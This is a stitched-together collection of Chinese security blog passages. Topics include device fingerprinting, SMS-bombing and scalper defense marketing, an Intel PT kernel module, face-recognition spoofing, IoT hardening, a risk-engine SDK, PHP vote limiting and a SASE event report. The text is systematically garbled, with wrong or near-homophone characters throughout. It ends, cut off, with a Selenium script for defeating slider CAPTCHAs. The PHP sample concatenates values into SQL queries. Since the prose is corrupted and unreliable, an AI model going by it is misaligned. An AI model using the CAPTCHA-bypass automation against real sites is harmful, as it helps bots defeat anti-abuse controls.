'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36' return info# 加工信息def process_info(info): processed_info = {} processed_info['platform'] = info['platform'] processed_info['os'] = info['os'] processed_info['browser'] = info['browser'] return processed_info# 生成设施指纹def generate_fingerprint(info): processed_info = process_info(info) json_info = json.dumps(processed_info, sort_keys=True) fingerprint = hashlib.md5(json_info.encode('utf-8')).hexdigest() return fingerprint# 测试if __name__ == '__main__': info = collect_device_info() fingerprint = generate_fingerprint(info) print(fingerprint)其实只是一个很简略的应用Python内置的库进行设施信息的收集和解决的过程，其中应用了MD5算法生成设施指纹。 ...

手机短信作为一种快捷的通信形式被广泛应用。不仅在集体日常生活中，企业也习惯应用手机短信来进行验证和揭示，以保障业务的失常进行。随着数字化的倒退，手机短信也成为了不法分子滥用的指标之一，给集体和企业带来不同经济损失。 集体遭短信轰炸 企业短信遭歹意滥用2023年2月，四川遂宁大英县公安局网安大队接省厅网安总队线索：辖区内某居民，每分钟都收到几条用本人手机号登录注册的验证码短信，一天接管数百条，不胜其扰。大英县公安局立刻发展侦察，通过数据源数据链进行研判剖析，第一工夫锁定了立功嫌疑人。经查立功嫌疑人熊某通过批改网络获取的短信群发代码，劫持多个商业网站注册接口管制其短信验证平台，登录API接口。而后通过本人编写的短信轰炸软件，具备向设定的手机号间断发送验证码短信的性能，之后，通过自行搭建的网站进行推广、售卖短信轰炸业务，非法获利10万余元。 除集体遭逢短信轰炸，企业的手机短信也可能受到滥用。不法分子利用技术手段批量发送短信申请，或者不相熟操作的用户频繁发送申请，导致平台重复发送短信，重大影响对企业的失常经营和用户体验。此外，不相熟操作的用户，容易频繁发送短信申请，导致平台屡次重复发送短信，节约企业的工夫和人力资源，减少企业的经济老本。 如何防备短信被盗发滥用无论集体遭逢短信轰炸还是企业短信遭滥用，归根结底是企业端口企业短信接口遭攻打导致，由此须要采取有效的平安保护措施，以防止手机短信的滥用。 1、设置短信发送工夫距离。设置同一个号码反复发送的工夫距离，个别设置为60-120秒，在肯定水平上避免短信接口被歹意攻打。 2、设置短信获取次数。限度某个手机号在某个时间段内获取短信验证码次数的下限，比方24小时、12小时、1小时不同次数等。 3、对短信调用IP进行限度。设置单个IP地址某个时间段内最大的发送量，不过可能会造成误伤。 4、部署智能验证码。在发送短信验证码之前，必须通过通过验证码的校验，避免软件自动化发送。顶象无感验证提供短信发送的验证码辅助平安验证，防备软件发送，并可能基于发送者环境、设施、危险数据等数据及专属风控模型，预估可能呈现的异样操作，为平安运维提供危险决策数据。 顶象无感验证集成13种验证形式，多种防控策略，会集了4380条危险策略、112类危险情报、笼罩24个行业、118种危险类型，防控精准度>99.9%，1天内便可实现从危险到情报的转化，行业危险感知能力实力增强，同时反对平安用户无感通过，实时反抗处理能力更是缩减至60s内。帮忙企业在登录、注册、领取等场景中实现疾速验证身份，大大提高了服务体验的便捷性和效率。 作为首个应用AIGC技术的业务平安产品，顶象无感验证集成Stable Diffusion开源模型能力，在危险拦挡、治理配置、用户体验、防备破解、验证图片生产效率等五个方面有大幅晋升。 1、危险拦挡率晋升19%。应用动态图库作为验证码图片时，图库更新一周当前，爬虫的拦挡防御能力会呈现显著的成果衰减，一个月左右，歹意爬虫通过率会达到20%。应用AIGC生成图片后，爬虫通过验证通过率立刻降落至0.8%以下，且长时间维持在1%以内。相比之前动态图库的状况下，AIGC大幅提高了验证难度和防御能力。 2、管理员配置效率晋升50%。原先应用动态图片时，须要管理人员进行手动调整配置的图集、图标库等因素，当初AIGC主动生成的图集间接缩小多个配置环节，效率晋升50%。 3、用户辨识度晋升70%。在AIGC和动态图片的比照试验中，85%的参与者认为应用AIGC生成的主题图片更加活泼和丰盛；在与视觉设计师考察中，92%的人示意喜爱应用AIGC生成的图片；在咱们的另外一个比照试验中，100名非深度验证码使用者，观看应用AIGC生成的主题图片和应用传统3D模型生成的动态主题图片，结果显示，AIGC生成的主题图片辨识度晋升了70%。 4、黑灰产破解成本增加10倍。应用动态图库时，因为验证码图集无限，攻击者只需定期爬取主题图片，而后针对性地打标训练新的辨认模型，就可疾速破解。AIGC技术可能生成海量图片，且有肯定随机性且不可逆，使攻击者打标训练老本可减少10倍以上，大幅减少机器破解的难度。而且AIGC可能依据企业业务场景，生成个性化定制验证码图片。 5、图片的生产数量晋升万倍。应用动态图库时，验证码企业须要一个月更新一次图库，每次更新图片几百到几千张，均匀每天只能设计十几张图。应用AIGC后，以单个GPU计算机为例，利用AIGC技术20秒就能够生成一张图片。应用100个GPU的小型计算集群，一天就能够生成43万2000张新的图片，一个月能够生成超过1000万张新图片。AIGC的生产能力是人工制图的万倍。 AIGC不仅晋升用户体验，带来新的验证形式，更加强验证码的安全性，更无效保障短信发送平安。 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

查看符号表编译好的内核的符号表通常保留vmlinux中，符号表通过nm查看nm -g vmlinux 把符号表加载进去，就能够通过kasan的报错信息看源码出错的信息 编写一个内核模块编写一个内核模块test.c，该模块作用是判断CPU是否反对intel pt #include <linux/module.h>#include <asm/nmi.h>#include <asm/page.h>#include <asm/msr.h>#include <asm/cpufeature.h>#include <linux/kernel.h>#include <linux/printk.h>unsigned a, b, c, d;#define BIT(x) (1ULL << (x))#define PRINT_ERROR(msg) printk(KERN_INFO "[VMX-PT] Error:\t%s\n", (msg))int init_module(void){ cpuid_count(0x07, 0, &a, &b, &c, &d); //判断是否反对 Intel PT 技术的逻辑是，查看 CPUID 指令返回的寄存器 EBX 的第 25 位是否为 1，如果为 0，则示意不反对 Intel PT 技术 if ((b & BIT(25)) == 0) { PRINT_ERROR("No PT support!"); return -EIO; }}void cleanup_module(void){ PRINT_ERROR("module unloaded!");}Makefile obj-m += test.oall: make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modulesclean: make -C /lib/modules/$(shell uname -r)/build M=$(PWD) cleanmake后生成test.ko文件,用insmod加载内核文件sudo insmod test.ko卸载模块能够应用sudo rmmod mymodule如果模块卸载胜利，能够应用 lsmod 命令查看已加载的模块列表，应该不再蕴含该模块。应用dmesg查看内核输入 ...

因为人脸识别技术呈现的危险问题，不足为奇。之前广州互联网法院通报了一起因为“刷脸”引发的借款纠纷。客户王兰（化名）在遗失了身份证后，却被人冒用身份通过银行的“人脸识别”贷款，导致王兰因逾期原告上了法庭。经司法笔迹鉴定，认为案涉客户签名并非王兰自己签订，手机号码亦未曾注销在王兰名下。最终，法院驳回银行全副诉讼请求。 前几年，还有一个新闻，四川警方查处一个上百人的欺骗团伙。该团伙购买大量人脸视频，借助“僵尸企业”“空壳公司”，为6000多人包装公积金信息，而后向多家银行申请公积金贷款，最终带来10亿多元的坏账。 就离谱是吧，然而人脸识别带来的危险是相对不可漠视的。咱们的确有必要把握一些伎俩来多方面晋升人脸识别利用平安。 人脸识别技术的危险人脸识别曾经成为登录、确认、申请、批改等业务环节中重要的验证技术，同时也存各类平安危险。 有媒体报道，大量社群和境外网站进行真人人脸识别视频的贩卖。“价高质优”的验证视频百元一套，动静软件将人脸照片制作成“动静视频”只有几元，以实现各类线上业务人脸识别的验证。此外，清华大学钻研人员已经在15分钟解锁了19个生疏智能手机。 能够分明地看到，人脸识别技术带来人们便当的同时，也要带来的各类仿冒、攻打、盗取等三类安全隐患。 仿冒登录。 戴上眼镜、帽子、面具等假装伎俩，或者能够制作人皮高仿模型、将2D人脸照片3D建模、利用AI技术将动态照片变成动静照片等多种技术均，混同算法判断，达到坑骗零碎的目标。能够骗过有效性不高的人脸识别算法和活体监测算法。 劫持篡改。 近程入侵篡改人脸识别系统验证流程、信息、数据等，将后盾或前端的真数据替换为假数据，以实现虚伪人脸信息的通过。 盗取冒用。 通过各类公开或非法手段，收集、保留、盗取失常的人脸数据，而后非法冒用。 因为人脸的构造、形状类似，并且脸部表情、角度、光线、环境、穿戴、年龄的因素，导致人脸的视觉图像也相差很大。因而，内部客观因素对人脸识别也带来较多影响。 多方面晋升人脸识别利用平安人脸识别是一个很大的话题，对于这方面的利用平安晋升，是一个很大的话题，本次文章就简略介绍一个形式（具体须要联合利用场景应用）。 1. 增强面部特色信息的加密和存储应用 OpenCV 库进行人脸识别，并通过哈希函数对面部特色信息进行加密。 import cv2import hashlib# 加载人脸识别模型face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')# 加载图像img = cv2.imread('face.jpg')# 将图像转换为灰度图像gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)# 进行人脸识别faces = face_cascade.detectMultiScale(gray, 1.3, 5)# 将人脸图像进行哈希for (x,y,w,h) in faces: face_img = img[y:y+h, x:x+w] face_hash = hashlib.sha256(face_img).hexdigest() print(face_hash)2. 检测面部特色信息的伪造应用 Python 和 OpenCV 库对人脸图像进行特征提取，并检测面部特色信息的伪造： import cv2import numpy as npfrom imutils import face_utils# 加载人脸识别模型detector = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')predictor = dlib.shape_predictor('shape_predictor_68_face_landmarks.dat')# 加载图像img = cv2.imread('face.jpg')# 将图像转换为灰度图像gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)# 进行人脸检测faces = detector.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=5, minSize=(30, 30))# 对每张人脸进行特征提取for (x, y, w, h) in faces: # 应用 dlib 库获取面部特色点 rect = dlib.rectangle(int(x), int(y), int(x + w), int(y + h)) landmarks = predictor(gray, rect) landmarks = face_utils.shape_to_np(landmarks) # 计算面部特色点之间的间隔 distances = [] for i in range(landmarks.shape[0]): for j in range(i+1, landmarks.shape[0]): distances.append(np.linalg.norm(landmarks[i] - landmarks[j])) # 计算面部特色点之间间隔的平均值和标准差 mean_distance = np.mean(distances) std_distance = np.std(distances) # 判断面部特色信息是否被伪造 if mean_distance < 40 or std_distance > 10: print('Face features have been tampered with') else: print('Face features are authentic')3.多因素身份验证先是滑动验证码 ...

限量版玩具始终是消费者关注的重点，却容易被羊毛党抢走。羊毛党将抢到玩具加价发售给其余消费者，由此侵害消费者利益，也给商家带来损失。 羊毛党为什么比消费者更容易抢到限量版玩具？次要是因为下单速度不同。同样一件商品，A比B早1秒钟，则A可能购买到，B则无奈购买到。在下单速度方面，人靠的是神经反馈，而软件是基于事后设置流程，因而运行速度远超过人，抢购成功率远远高于一般消费者。 羊毛党就是通过舞弊工具，进行批量注册登录抢购等操作，从而疾速、刹时、批量对指定商品、服务进行哄抢。同时舞弊工具集成破解性能，能破解电商下单协定，绕过图片验证码，主动更换IP地址，伪造设施编号等。只须要填写好账号密码，设置好运行工夫，就可能实现主动抢购，省时省力又省钱。 泡泡玛特引入顶象无感验证，防备羊毛党抢购限量版玩具。消费者通过泡泡玛特小程序中购买限量版玩具时，无感验证会依据消费者的行为和设施信息，疾速精确地区分操作者是人还是机器，及时甄别出羊毛党的机器账号，实时监控并拦挡歹意行为，保障购物的公平性和安全性。 顶象无感验证集成13种验证形式，多种防控策略，会集了4380条危险策略、112类危险情报、笼罩24个行业、118种危险类型，防控精准度>99.9%，1天内便可实现从危险到情报的转化，行业危险感知能力实力增强，同时反对平安用户无感通过，实时反抗处理能力更是缩减至60s内。帮忙企业在登录、注册、领取等场景中实现疾速验证身份，大大提高了服务体验的便捷性和效率。 作为首个应用AIGC技术的业务平安产品，顶象无感验证集成Stable Diffusion开源模型能力，在危险拦挡、治理配置、用户体验、防备破解、验证图片生产效率等五个方面有大幅晋升。 1、危险拦挡率晋升19%。应用动态图库作为验证码图片时，图库更新一周当前，爬虫的拦挡防御能力会呈现显著的成果衰减，一个月左右，歹意爬虫通过率会达到20%。应用AIGC生成图片后，爬虫通过验证通过率立刻降落至0.8%以下，且长时间维持在1%以内。相比之前动态图库的状况下，AIGC大幅提高了验证难度和防御能力。 2、管理员配置效率晋升50%。原先应用动态图片时，须要管理人员进行手动调整配置的图集、图标库等因素，当初AIGC主动生成的图集间接缩小多个配置环节，效率晋升50%。 3、用户辨识度晋升70%。在咱们组织的AIGC和动态图片的比照试验中，85%的参与者认为应用AIGC生成的主题图片更加活泼和丰盛；在与视觉设计师考察中，92%的人示意喜爱应用AIGC生成的图片；在咱们的另外一个比照试验中，100名非深度验证码使用者，观看应用AIGC生成的主题图片和应用传统3D模型生成的动态主题图片，结果显示，AIGC生成的主题图片辨识度晋升了70%。 4、黑灰产破解成本增加10倍。应用动态图库时，因为验证码图集无限，攻击者只需定期爬取主题图片，而后针对性地打标训练新的辨认模型，就可疾速破解。AIGC技术可能生成海量图片，且有肯定随机性且不可逆，使攻击者打标训练老本可减少10倍以上，大幅减少机器破解的难度。而且AIGC可能依据企业业务场景，生成个性化定制验证码图片。 5、图片的生产数量晋升万倍。应用动态图库时，验证码企业须要一个月更新一次图库，每次更新图片几百到几千张，均匀每天只能设计十几张图。应用AIGC后，以单个GPU计算机为例，利用AIGC技术20秒就能够生成一张图片。应用100个GPU的小型计算集群，一天就能够生成43万2000张新的图片，一个月能够生成超过1000万张新图片。AIGC的生产能力是人工制图的万倍。 AIGC不仅晋升用户体验，带来新的验证形式，更加强验证码的安全性，更无效防备羊毛党的肆虐。 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

IoT设施不须要加固？想多了2016年，一家名为Dyn的域名服务提供商蒙受了规模为历史最大的DDoS攻打，其服务在美国东部地区和欧洲地区都受到了影响。该攻打的威力之大，足以将互联网的外围基础设施推向瘫痪的边缘，因为Dyn是一家为寰球数百万互联网域名提供解析服务的公司，包含Netflix、Twitter和Paypal在内的许多重要网站都依赖于Dyn的服务。 该攻打应用了大量未经平安加固的IoT设施，包含数字摄像头和智能家居设施，这些设施没有默认明码或者弱密码保护，因而容易被攻击者入侵。攻击者利用了这些设施的破绽，将它们变成了“僵尸设施”，并应用它们发动了大规模的DDoS攻打。 再回到咱们的问题：IoT设施须要加固？ 答案：是的。因为IoT设施通常波及到隐衷、平安和财务信息，如果不加固，可能会受到歹意攻打，导致数据泄露、损坏设施、危害用户等问题。加固IoT设施能够加强其安全性，缩小被攻打的危险。 IoT设施如何加固？IoT设施加固是确保设施安全性的要害措施。因为IoT设施品种繁多，加固办法也因设施而异。本文将介绍一些通用的IoT设施加固技术，并提供一些Python代码示例。 1. 更新固件固件更新是IoT设施加固的要害一步。在更新固件之前，应该先理解设施的安全漏洞和修补程序。设施供应商通常会公布平安布告和固件更新。所以，企业能够定期检查更新，以确保设施的安全性。 以下是Python示例代码： import requests# 从设施供应商获取固件更新url = 'https://iot-device.com/firmware/latest'response = requests.get(url)# 下载最新固件with open('latest_firmware.bin', 'wb') as f: f.write(response.content)2. 增强身份验证强身份验证是避免未经受权的拜访IoT设施的无效办法。咱们能够应用基于令牌的身份验证，以及多因素身份验证等办法，来增强身份验证。 import requests# 获取拜访令牌url = 'https://iot-device.com/token'data = {'grant_type': 'client_credentials', 'client_id': 'my_client_id', 'client_secret': 'my_client_secret'}response = requests.post(url, data=data)# 发送申请url = 'https://iot-device.com/api/data'headers = {'Authorization': 'Bearer ' + response.json()['access_token']}response = requests.get(url, headers=headers)3. 应用加密协议在IoT设施通信中应用加密协议是爱护通信的要害。应用TLS协定等加密协议能够确保设施与云端之间的通信是平安的。 import socketimport ssl# 应用TLS协定进行平安通信hostname = 'iot-device.com'port = 443# 创立安全套接字context = ssl.create_default_context()with socket.create_connection((hostname, port)) as sock: with context.wrap_socket(sock, server_hostname=hostname) as ssock: # 发送和接收数据 ssock.sendall(b'Hello, IoT device!') data = ssock.recv(1024)4. 限度网络拜访在IoT设施上凋谢的端口和服务应该尽可能少。未经受权的网络拜访是IoT设施受攻打的次要路径之一。咱们能够应用网络防火墙和平安组等网络安全措施来限度网络拜访。 ...

近日，某家电企业在官网商城举办五一促销，流动期间，用户能够购买特价电饭煲、电饼铛等小家电，吸引了泛滥消费者的关注，也被羊毛党盯上。流动刚开始不久，羊毛党们就简直全副扫空了特价小家电，导致企业损失数十万元。该家电企业迅速部署了风控系统，并对流动规定进行细化。流动再次重启后，风控系统发现了大量涉嫌参加羊毛党的账号，并及时对其进行了拦挡，保障了流动的顺利进行。 通过这次事件的教训，该家电企业粗浅意识到，在线上促销流动中增强危险管制十分必要，无效的预防和应答措施，能力更好地爱护企业的利益和消费者权利。 风控是业务平安必备工具风控是电商平台和网购App必不可少的平安保障工具，可能对平台和用户的各种危险进行无效监控和预防，进步平台和用户的平安防护能力，保障电商行业的衰弱倒退。 辨认欺诈交易：通过对用户行为和数据的剖析，风控系统可能辨认出异样交易，如刷单、虚伪订单等欺诈行为，无效避免商家和平台被蒙骗。 防备领取危险：风控系统能够对领取行为进行监控，及时发现和阻止歹意领取和欺诈行为，保障资金平安。 防备账号盗用和篡改：通过对用户登录、注册、明码批改等行为进行监控，风控系统能够尽早发现账号被盗用或者信息被篡改的状况，及时采取措施，爱护用户的集体信息安全。 防备攻打和入侵：风控系统能够辨认和进攻各种网络攻击和入侵，确保网站和App的失常运行，保障用户数据的平安。 为了防备各种业务危险，爱护平台和商家的利益，以及进步用户体验，电商网站和App须要建设专属的风控体系。 疾速接入顶象SaaS实时决策引擎传统的风控系统比较复杂，因为技术和人才的限度，风控系统的启用比较复杂，须要专业知识和技能，更须要业余人员进行操作和保护。 随着风控技术的不断完善和遍及，古代的智能风控系统都采纳了大数据技术、人工智能等前沿技术，可能自动化地对用户的行为和交易进行监测和剖析，并且还能依据不同的业务场景进行相应的定制化配置，这使得任何一个企业都能够轻松地启用风控系统，保障其业务的平安稳固经营。 顶象Dinsight实时风控引擎，反对私有化部署和SaaS服务。以SaaS接入为例：第一步，注册/登陆 顶象进攻云，开明实时危险决策服务。 第二步，拜访 [实时危险决策] - [利用治理] 菜单，新增利用。用来标识用户入口，比方：App、Web等。 第三步，拜访 [实时危险决策] - [事件治理] 菜单，新增事件。用来标识利用下的具体业务事件，比方：注册、登录、营销流动。 第四步，拜访 [实时危险决策] - [风控策略] - [策略管理] 菜单，增加一条简略策略。 第五步，业务后盾开始集成。在顶象进攻云创立好利用和事件后，业务开发就能够开始集成工作，这里以java语言为例，其余语言集成相似。 集成SDK下载：https://www.dingxiang-inc.com/docs/detail/ctu#doc-h2-71）maven我的项目中引入依赖： <dependency> <groupId>com.dingxiang-inc</groupId> <artifactId>ctu-client-sdk</artifactId> <version>2.2</version></dependency>2）在业务逻辑解决中，调用危险辨认服务： 集成代码里的appId、appSecret、event_code参数值，能够登陆顶象进攻云后盾获取： 更多参数阐明：https://www.dingxiang-inc.com/docs/detail/ctu#doc-h3-72 public static final String url = "https://sec.dingxiang-inc.com/ctu/event.do";/** *利用AppId，公钥 **/public static final String appId = "你的AppId";/** *利用AppSecret，私钥，请做好保存，不要裸露进来 **/public static final String appSecret = "你的AppSecret"; ...

最近老板的老婆在加入一项什么“指尖博物馆”的评比，因而老板每天在群里给咱们发链接让咱们投票。咱们脚踏实地每天一投，甚至还互相揭示，齐全把这个当成事业在致力。后果，对面间接不按常理出牌，一夜就刷了300票，咱们一早来，发现这个数据，面面相觑：这相对是刷票了吧！ 这就是当初网络投票的现状，可能一开始开启网络刷票的人并没有想到会变成这样。本认为这将是民心的体现，具备偏心、公正、通明的特质。而且它不须要场地、设施、人力，更不须要大量资金，极大地节俭了人力老本。最重要的是，它能通过网络迅速流传流动信息、扩充影响规模，最初的数据一导出，妥妥一大亮点。 大失所望，网络投票中的刷票行为，让这本来能够最大体现民心的设置，成了黑灰产牟利的“利器”。“某某评比开始啦，请动动你的手指为咱们投上贵重的一票”“本次评选活动对咱们很重要，咱们须要您的反对，鞠躬感激”……每次朋友圈看到这样的话，我都心有戚戚：发了也没用呀，对面可能间接机器刷票了！ 网络刷票的两种模式网络刷票背地有一群分工明确的黑灰产业。所谓黑灰产是指利用计算机、网络等伎俩，基于各类破绽，通过恶意程序、木马病毒、网络、电信等模式，以非法盈利为目标规模化、组织化、分工明确的群体组织。 网络刷票模式，次要有人工刷票与机器刷票两种。 人工刷票：就是一些闲暇工夫多的人士，以帮忙参赛选手投票来取得“佣金”为次要工作。这些人少数为兼职投票手，外界称之为投票水军。 技术刷票：通过抓包工具剖析提交投票时所产生的数据，而后应用脚本程序批量提交数据的刷票形式。 通过剖析能够发现，网络刷票黑灰产揽客次要分为三步：第一步，在网上搜寻这类评选活动，通过假冒主办方或媒体等形式，拨打参选对象单位公开的办公电话，索要参选者私人联系方式。第二步，抛钓饵强卖。会以“业余高价、保障平安”、“先刷后付”等话术来诱骗参选人交钱刷票，不论参选人是否批准，团伙都会假意进行大量刷票，为下一步欺骗进行铺垫。第三步，威逼+欺骗。即使参选者交了一部分的预付金，欺骗团伙也不会再帮你刷票了。而是以此为威胁一直加价，等到流动快完结时，再以冲击排名为由欺骗一笔。 此外，为了吸引参与者自发的去拉票刷票，商家往往会将投票配合处分去吸引投票用户。由此经引起“羊毛党”留神，呈现组队集团化刷票薅礼品的景象。 如何防止网络刷票毫无疑问，网络刷票对于发起者（商家）、参与者、投票用户这三方来说，都是会造成损失的。咱们须要采取肯定的措施来避免黑灰产进行刷票。 比较简单的形式有以下集中： 1. 验证码： 在投票页面中退出验证码性能，通过输出验证码来确认投票者是实在的人类用户，而不是机器人或其余主动程序。这里能够应用顶象的收费验证码，因而就不开展叙述了。 2. IP地址限度： 通过限度雷同IP地址的投票次数，能够避免同一IP地址的用户对同一选项进行屡次投票。P地址限度能够通过服务器端脚本语言（如PHP、Python等）或者Web服务器（如Apache、Nginx等）来实现。 <?php// 获取投票者的IP地址$ip = $_SERVER['REMOTE_ADDR'];// 设置IP地址的投票次数下限为10次$vote_limit = 10;// 判断IP地址的投票次数是否曾经超过下限if(get_votes_count($ip) >= $vote_limit){ // 如果超过了下限，提醒投票失败 echo "投票失败，您曾经超过投票次数限度！";}else{ // 如果没有超过下限，进行投票操作 do_vote(); // 记录投票记录 record_vote($ip); // 提醒投票胜利 echo "投票胜利，谢谢您的反对！";}// 获取指定IP地址的投票次数function get_votes_count($ip){ // 连贯数据库 $conn = mysqli_connect('localhost', 'username', 'password', 'database'); // 查问指定IP地址的投票次数 $result = mysqli_query($conn, "SELECT COUNT(*) AS count FROM votes WHERE ip='$ip'"); // 获取投票次数 $row = mysqli_fetch_assoc($result); $count = $row['count']; // 敞开数据库连贯 mysqli_close($conn); return $count;}// 记录投票记录function record_vote($ip){ // 连贯数据库 $conn = mysqli_connect('localhost', 'username', 'password', 'database'); // 插入投票记录 mysqli_query($conn, "INSERT INTO votes (ip) VALUES ('$ip')"); // 敞开数据库连贯 mysqli_close($conn);}// 进行投票操作function do_vote(){ // TODO：进行投票操作}?>3. Cookie限度： 通过在用户浏览器中设置Cookie，能够限度同一浏览器的用户对同一选项进行屡次投票。 ...

2023年3月，亿格云携手阿里云独特举办的零信赖SASE办公平安专场沙龙圆满结束，在线上沙龙中，来自亿格云、数云和阿里云的三位行业专家，联合企业在数字化转型下面临的办公平安挑战和企业实际进行了具体的解读。 零信赖SASE,一体化办公平安解决方案企业数字化转型、近程办公、企业上云已成为时代的大势，企业将与更多的生态搭档单干、布局更多的分支和业务出海等模式减速业务的倒退，但数字企业也面临办公平安边界“沦亡”、旧的平安体系无奈适应业务倒退、数据泄露危险加剧三大平安挑战，亿格云 陈吴栋 给出了相应剖析。 数字企业办公平安面临三大窘境： 旧体系缺点：近程办公等混合办公模式，加剧员工数据泄露危险；企业分支与总部平安建设水位不对立。平安老本高：总部或分支都别离须要部署10余款安全设备来进行碎片化平安体系建设；还须要业余宏大的平安团队撑持经营治理，洽购跟经营老本都非常昂扬。防护成果差：泛滥Agent运行，办公体验不佳，影响员工办公效率；泛滥产品数据割裂，导致平安经营成果差，呈现安全事件须要联结多种平安产品才可实现溯源和处理，这个周期通常须要180天后能力恢复正常运行。下一代办公平安架构企业迫切需要构建一个更全面、更高效、更加体验良好的新的办公平安体系来，这就要求下一代新的平安办公的体系须要合乎四大外围要求：云原生体系架构、平安能力交融一体化、分支和总部平安水位一致性、无效实现降本增效！这样的时代背景下，以零信赖为核心的SASE平安架构应运而起。 谈及零信赖SASE一体化办公平安产品时，亿格云 陈吴栋 介绍了亿格云枢的研发思路和五大落地场景，（亿格云枢）基于云网端交融的云原生平安体系，以 SaaS 化的服务提供零信赖平安拜访 (ZTNA) 、数据防透露 (XDLP) 、威逼检测响应 (XDR) 、防病毒、上网行为管控、桌面治理等平安能力。切实落地 「企业办公平安数字化治理」、「近程平安运维，一体化全面防护」、「商业软件正版化治理，辞别律师函」、「多分支办公对立平安治理、降本增效」、「全链路数据防透露」等落地场景。 最初，亿格云 陈吴栋 也示意零信赖SASE一体化平台其实整体是重塑企业办公平安的顶层设计，突破传统架构平安成果差、体验差、难经营的怪圈。目前产品曾经服务吉利控股、传音控股、零跑汽车、怪兽充电、数云、涂鸦智能等多个行业的头部客户，将来也将一直优化平安能力，带来更多的实际与案例分享。 数云SASE落地实际,平安体系和撑持基座的交融建设数云作为国内当先的消费者数字化经营科技公司，专一于提供全渠道消费者经营零碎和服务。数云已服务了7000+国内国内批发品牌。在数云信息化与平安资深总监 罗兴峰 看来，业务高速倒退的同时，平安亦是业务倒退的基石。因而他们很早就开始以”业务平安“为核心，摸索数云的数据安全管理体系。 在本次分享中，罗兴峰 具体介绍了数云面临的业务平安挑战以及需要，搭建零信赖SASE架构的平安计划及落地功效。谈及数云面临的平安挑战，总结演绎为以下几点： 日益增长的业务量和新的业务模式，使得网络接入时要保障灵活性的同时实现接入平安。业务发展须要团队资源的弹性能力。保障我的项目顺利同时，实现拜访权限最小化。身份源须要治理多方资源，身份源需联合企业人力治理流程和办公流程，使得平安环节平滑融入到治理流程中。员工入到职是否带走敏感数据？多方合作的人员，不同的人身份是否精确辨认并给予相应权限？在不影响日常工作体验与流程的根底上是否能进步平安基线？企业短期内无奈投入过多平安老本的前提下，如何保障平安成果？这些其实是每一位企业的平安或IT负责人所面临的难题。通过寻找与摸索，数云找到了适宜企业本身倒退的平安门路。 数云从开始始终在寻找多端交融平安计划，即交融 VPN 、杀毒，以及数据防透露等性能为一体的计划。罗兴峰 发现：零信赖对于数云多外出办公的场景十分匹配，能精准实现身份的辨认与治理，随着零碎的零信赖革新，角色权限等粗疏化模型也在一直交融跑通。随同着企业业务一直倒退会呈现新的问题，跟踪平安流程并进行平安改良也至关重要。成长型的零信赖计划与成长型的企业倒退流程一起优化，在一直发现问题后改良，就有可能“跑”得比攻击者快，这种继续化的平安优化会让企业的平安能力越来越强。 通过全方位的考量评估后，数云抉择了亿格云的零信赖SASE一体化解决方案，并构建了数云办公平安经营体系。数云零信赖SASE平台落地接入后实现多项安全控制能力： 企业生态协同中的不同身份源能够通过亿格云SASE对立治理，基于身份和安全策略的联动，对企业多个内网利用的管控，造成企业运行的平安框架。针对不同的平安危险环节（如内部合作、外部入到职、特定业务数据防透露），用绝对正当的人力投入通过高效的经营数据审计审核形式，实现高频率发展日常平安巡检，无效实现日常的平安经营。 最初，罗兴峰 总结了顺利落地SASE架构后的最大变动，即端点平安与企业运行流程全面疾速交融且无效。 零信赖SASE,数字化办公时代的危险经营实际数字化办公潮流下，无论是我国在线办公软件用户规模，还是中国数字化办公市场规模，都在快速增长，这带来了许多平安和合规的挑战。面对这样的挑战，阿里云日志服务SLS技术专家 豁朗 示意：交融网络与平安的SASE架构正是破解之道。 亿格云基于阿里云日志服务SLS打造的SASE计划基于云原生架构，以身份为驱动，反对所有办公边缘以及寰球业务分部，无论何时何地何处都能够实现平安防护，大大降低传统平安计划的复杂性和投入老本。 该计划基于亿格云零信赖SASE平台产生的海量平安剖析日志，包含不限于内网剖析日志、软件剖析日志和上网行为日志等。通过日志投递，将日志投递到阿里云SLS 平台，能够利用阿里云 SLS 平台的多项能力，包含长期存储、可观测剖析、可视化剖析、智能告警、查问剖析、智能检测等。 基于阿里云SLS可观测平台的联结计划，为亿格云零信赖SASE平台带来3大劣势： 反对多达13种亿格云平安数据低成本长期存储、满足合规要求；内置丰盛阿里云日志服务SLS仪表盘、洞察平安数据反对阿里云控制台对日志的高效查问剖析、自定义告警豁朗 还为大家展现了亿格云+阿里云SLS交融计划的实操案例，从“ 网络拜访和数据安全统计、查问剖析、终端统计、查问剖析、告警统计”等5个方面展现，用户能够分明地看到对于企业用户、数据、软件的动静与剖析，能更高效的帮忙企业进行平安管控与躲避危险。 作为云原生可观测平台的阿里云日志服务SLS， 具备多源数据对立采集存储、灵便的数据加工ETL、高效智能的查问剖析、智能告警中枢4大性能体系。同时具备对立接入、一站式服务、智能高效、弹性低成本等技术劣势。 最初，豁朗 示意，目前阿里云日志服务SLS平台在阿里巴巴规模化经营和被集成，作为自研和自用的可观测数据平台，日接入数据超 10 PB，日调用剖析超 10 亿次，接入二次开发利用数量超 1000 个。在利用性能剖析、网络流量剖析、平安审计和老本剖析四个方面提供价值，将来，也期待与更多生态合作伙伴单干共赢！ 原文链接 本文为阿里云原创内容，未经容许不得转载。

说在后面：次要应用 Python 的 Selenium 库和对应的 WebDriver（例如 ChromeDriver），通过模仿鼠标操作实现。 代码示例接下来间接上干货： 应用 Selenium 启动浏览器，并关上验证码页面。from selenium import webdriverdriver = webdriver.Chrome() # 应用 Chrome 浏览器driver.get('https://example.com/captcha') # 关上验证码页面切换到蕴含验证码的 iframe 中。iframe = driver.find_element_by_xpath('//iframe[@id="captcha-iframe"]')driver.switch_to.frame(iframe)找到验证码的滑块和背景图片，并应用 Pillow 库加载图片。from PIL import Imagefrom io import BytesIOslider = driver.find_element_by_xpath('//div[@class="slider"]')slider_img = slider.find_element_by_xpath('.//img').get_attribute('src')bg = driver.find_element_by_xpath('//div[@class="bg"]')bg_img = bg.find_element_by_xpath('.//img').get_attribute('src')bg_image = Image.open(BytesIO(requests.get(bg_img).content))slider_image = 